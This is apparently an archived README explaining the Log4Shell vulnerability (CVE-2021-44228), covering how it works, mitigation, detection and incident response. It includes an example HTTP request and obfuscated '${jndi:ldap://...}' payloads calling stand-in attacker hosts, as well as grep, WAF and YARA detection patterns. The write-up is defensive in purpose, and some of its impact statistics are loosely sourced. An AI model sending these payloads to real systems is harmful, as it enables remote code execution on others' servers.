Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
CVE-2021-44228
Readme
# 💥 CVE-2021-44228 — **Log4Shell**
### *The Most Impactful Vulnerability of the Decade (Discovered Dec 2021)*
---
## 🧠 **Quick Summary**
| Item | Detail |
| ------------------ | ------------------------------------------------ |
| **CVE ID** | CVE-2021-44228 |
| **Nickname** | *Log4Shell* |
| **Component** | Apache **Log4j 2** (2.0-beta9 → 2.14.1) |
| **Type** | Remote Code Execution (RCE) |
| **CVSS v3 Score** | 💣 **10.0 / 10.0 (Critical)** |
| **Discovery Date** | December 2021 |
| **Patched In** | Log4j 2.15.0 and later (recommended: 2.17.1 +) |
| **Attack Surface** | Any system that logs untrusted input using Log4j |
---
## ⚙️ **How It Works**
<img width="1249" height="709" alt="log4j_explanation" src="https://github.com/user-attachments/assets/b608ea1c-7062-4fbf-9786-792f150a0e4b" />
1. Log4j supports **lookups** like `${…}` in log messages.
2. When it sees `${jndi:ldap://attacker.com/a}`, it performs a **JNDI lookup**.
3. The lookup can retrieve a **remote Java class** from the attacker’s server.
4. That class executes inside your application — giving the attacker **remote control**.
💡 **One malicious string in a log = full server compromise.**
---
## ⚔️ **Example Attack**
```http
GET /login HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://evil.com/exploit}
```
➡️ When the app logs this header, Log4j performs a lookup and loads the attacker’s code.
---
## 🧩 **Affected Versions**
```
✅ Safe: Log4j ≥ 2.17.1
⚠️ Vulnerable: 2.0-beta9 → 2.14.1
```
> 🧾 Always confirm the latest release on [Apache’s official download page](https://logging.apache.org/log4j/2.x/download.html).
---
## 🚀 **Timeline**
| Date | Event |
| ------------------ | --------------------------------------------- |
| 🗓️ Nov 24 2021 | Vulnerability reported privately to Apache |
| 🗓️ Dec 9 2021 | Public disclosure & widespread exploitation |
| 🩹 Dec 10 2021 | Patch 2.15.0 released |
| 🛠️ Dec 14-20 2021 | Further fixes: CVE-2021-45046 / 45105 / 44832 |
| 🧩 2022–2025 | Continuous updates & vendor mitigations |
---
## 🧱 **Root Cause**
* Log4j allowed **message lookup substitution** via `${…}`.
* The **JNDI lookup** functionality permitted **remote code loading** through LDAP, RMI, or other protocols.
* Result: attacker-controlled input → code execution in the JVM.
---
## 🛡️ **Mitigation Matrix**
| Priority | Action | Command / Note |
| -------------------------- | ----------------------------------- | ---------------------------------------------------------------------------------- |
| ⭐ **1. Upgrade (Best)** | Upgrade Log4j to latest (2.17.1 +). | `mvn dependency:tree` → find → update dependency |
| ⚡ **2. Remove Class** | Delete `JndiLookup.class` from jar. | `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` |
| 🧩 **3. Temp Property** | Disable lookups (limited effect). | `-Dlog4j2.formatMsgNoLookups=true` |
| 🧱 **4. Network Controls** | Block outbound LDAP/RMI traffic. | via firewall or egress ACL |
| 🧰 **5. WAF / IDS Rules** | Block `${jndi:` payloads. | add to ModSecurity / Snort rules |
---
## 🔍 **Detection & Hunting**
### 🔎 Search for Injection Attempts
```bash
grep -R "\${jndi:" /var/log/* 2>/dev/null
```
### 🌐 Network Indicators
* Outbound connections to strange LDAP/RMI/DNS hosts.
* Unusual traffic on 389 (LDAP), 1099 (RMI), 1389, or 53 (DNS).
### 🕵️ Common Payload Patterns
<img width="1920" height="957" alt="nessus3" src="https://github.com/user-attachments/assets/ae2be0c1-1502-4170-a24f-64e286aa696a" />
```
${jndi:ldap://attacker.com/a}
${${lower:j}${upper:ndi}:ldap://evil.com/b}
```
<img width="1920" height="959" alt="nessus4" src="https://github.com/user-attachments/assets/543c5f93-535e-42c6-9f3c-eb094c3ec722" />
<img width="1920" height="958" alt="nessus5" src="https://github.com/user-attachments/assets/508a3130-3529-4082-a118-b6ac8d479942" />
*(attackers obfuscate to bypass filters)*
---
## 🔦 **Incident Response Playbook**
| Step | Task | Description |
| ---- | ------------------- | ------------------------------------------------ |
| 1️⃣ | **Identify** | Locate all Log4j jars in apps/containers. |
| 2️⃣ | **Prioritize** | Internet-facing or high-privilege systems first. |
| 3️⃣ | **Contain** | Remove access, isolate servers if compromised. |
| 4️⃣ | **Mitigate** | Apply fixes or remove vulnerable classes. |
| 5️⃣ | **Hunt IOCs** | Search for `${jndi:` and outbound LDAP traffic. |
| 6️⃣ | **Patch & Restart** | Upgrade to safe versions and redeploy. |
| 7️⃣ | **Verify** | Re-scan and monitor for exploitation. |
---
## 🧰 **Helpful Commands**
```bash
# Locate vulnerable jars
find / -type f -name "log4j-core-*.jar" 2>/dev/null
# Remove dangerous class
for j in $(find / -type f -name 'log4j-core-*.jar'); do
zip -q -d "$j" org/apache/logging/log4j/core/lookup/JndiLookup.class && echo "patched $j"
done
# Hunt suspicious patterns
zgrep -n '\${jndi:' /var/log 2>/dev/null
```
---
## 🧾 **Follow-On Vulnerabilities**
| CVE | Issue | Severity |
| -------------- | ------------------------ | ----------- |
| CVE-2021-44228 | Original RCE (Log4Shell) | 🔴 Critical |
| CVE-2021-45046 | Patch bypass → RCE | 🔴 Critical |
| CVE-2021-45105 | DoS via recursion | 🟠 High |
| CVE-2021-44832 | Config-based RCE | 🟠 High |
---
## 🏗️ **Impact Scope**
* **Millions** of apps: Minecraft servers, enterprise Java apps, Apache Solr, Kafka, Elasticsearch, Jenkins, and many cloud services.
* **Attackers** exploited it within hours of disclosure.
* **Global response:** CISA, Microsoft, AWS, Cloudflare, and others issued emergency advisories.
---
## 🔒 **Long-Term Defense**
1. Maintain a **Software Bill of Materials (SBOM)**.
2. Automate **dependency scanning** (Snyk, Dependency-Check, Trivy).
3. Isolate logging frameworks and limit egress.
4. Implement a **zero-trust egress policy**.
5. Regularly patch all third-party dependencies.
---
## 📚 **Key References**
* 🧩 [Apache Log4j Security Page](https://logging.apache.org/log4j/2.x/security.html)
* 🔐 [NVD CVE-2021-44228 Entry](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
* 🧰 [CISA Guidance & Affected-Software DB](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance)
* 🏢 [Microsoft Security Blog Response](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228)
---
## 🧭 **TL;DR for Teams**
> “Check every Java service.
> If Log4j 2.x ≤ 2.14.1 → upgrade now.
> If can’t upgrade → remove `JndiLookup.class` + block LDAP/RMI.
> Scan logs for `${jndi:`.
> Don’t sleep until patched.”
---
## 🛡️ **Mitigation Cheat Sheet**
| **Action** | **Command / Step** |
|-------------------------------------|--------------------|
| **Upgrade (Best)** | `mvn dependency:tree` → Update to **2.20.0+** |
| **Quick Fix (2.x)** | Set: `log4j2.formatMsgNoLookups=true` |
| **Emergency Patch** | Delete: `org/apache/logging/log4j/core/lookup/JndiLookup.class` |
| **Detect in Code** | Scan with **Snyk**, **OWASP Dependency-Check** |
| **Block Network** | Firewall: Block outbound `389`, `1099`, `1389` |
| **WAF Rule** | Block: `\$\{jndi:(ldap|rmi|dns):.*\}` |
---
## 📅 **Timeline (2021–2025)**
```mermaid
gantt
title Log4Shell Timeline
dateFormat YYYY-MM-DD
section Disclosure
Identified :done, 2021-11-24, 7d
Public Reveal :active, 2021-12-09, 1d
section Patches
2.15.0 (Partial) :done, 2021-12-10, 2d
2.16.0 / 2.17.0 :done, 2021-12-17, 3d
section Ongoing
Legacy Systems Vulnerable :crit, 2022-01-01, 1400d
2025 Status :active, 2025-11-05, 1d
```
---
## 🕵️♂️ **Detection Signatures**
```bash
# In Logs
grep -r "\${jndi:" /var/log/
# HTTP Headers
User-Agent:.*\$\{.*jndi.*
```
**YARA Rule (Simplified):**
```yara
rule Log4Shell_Payload {
strings:
$payload = /\$\{jndi:(ldap|rmi|dns|iiop):\/\/[^}]+\}/
condition:
$payload
}
```
---
## 🌍 **Global Impact (2021–2025)**
| **Sector** | **Affected** | **Notable Victims** |
|--------------------|--------------|---------------------|
| **Cloud** | 90%+ | AWS, Azure, GCP |
| **Enterprise** | High | Apple, Tesla, Cisco |
| **Gaming** | Yes | **Minecraft** |
| **IoT / Embedded** | Persistent | Routers, DVRs |
> **Still in the Wild (2025):**
> - ~**3.8 million** unpatched instances detected (Shodan, 2024)
> - Used in **state-sponsored attacks** (APT41, etc.)
---
## 🔒 **Final Checklist**
- [ ] **Upgraded Log4j?** → `2.20.0+`
- [ ] **Removed JndiLookup.class?**
- [ ] **Enabled WAF rules?**
- [ ] **Scanned dependencies?**
- [ ] **Monitored outbound LDAP?**
---
> **Log4Shell is not over.**
> It’s the **gift that keeps on giving** — for attackers.
---
**Resources:**
- [Apache Log4j Security](https://logging.apache.org/log4j/2.x/security.html)
- [CISA Alert](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Log4j Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
---
*Stay patched. Stay safe.*
**#Log4Shell #Cybersecurity #ZeroDay**
File Snapshot
[4.0K] /data/pocs/796d554c300755b84f86da818de4c931306b176a
└── [ 10K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →